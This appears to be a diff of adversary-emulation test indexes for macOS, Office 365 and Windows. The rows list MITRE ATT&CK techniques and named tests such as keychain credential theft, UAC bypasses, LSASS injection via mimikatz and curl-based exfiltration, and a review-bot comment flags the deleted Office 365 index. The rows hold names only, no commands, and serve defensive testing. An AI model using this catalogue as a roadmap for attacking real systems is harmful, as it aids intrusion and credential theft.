162 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
163 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
164 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
165 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
166 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
167 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
168 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
169 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
170 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
171 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
172 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
173 credential-access T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
174 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
175 credential-access T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
176 credential-access T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
177 credential-access T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
178 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
179 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
180 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
181 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
182 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
183 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
184 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
185 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
186 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
187 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
188 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
189 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
190 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
191 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
192 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
193 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
194 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
195 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
196 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
197 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
198 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
199 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
200 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
201 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
202 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
203 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
204 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
205 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
206 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
207 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
208 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
209 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
210 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
211 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
212 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
213 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
214 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
215 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
216 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
217 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
218 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
219 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
220 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
221 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
222 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
223 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
224 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
225 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
226 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
227 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
228 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
229 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
230 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
231 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
232 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
233 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
234 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
235 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
236 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
237 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
238 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
239 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
240 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
241 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
242 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
243 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
244 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
245 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
246 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
247 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
248 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
249 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
@@ -1,4 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
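Review bot: this hunk removes the whole four-line Office 365 index (the header row plus the three powershell test rows for T1114.003 and T1562.008) rather than editing it, and nothing in the visible diff shows a replacement index with those rows; the commit message should say whether this index is being regenerated under another path or intentionally dropped, since anything that reads the index at the old path will otherwise break silently.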
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 collection T1114.003 Email Collection: Email Forwarding Rule 1 Office365 - Email Forwarding 3234117e-151d-4254-9150-3d0bac41e38c powershell
3 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
4 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
@@ -1,1121 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
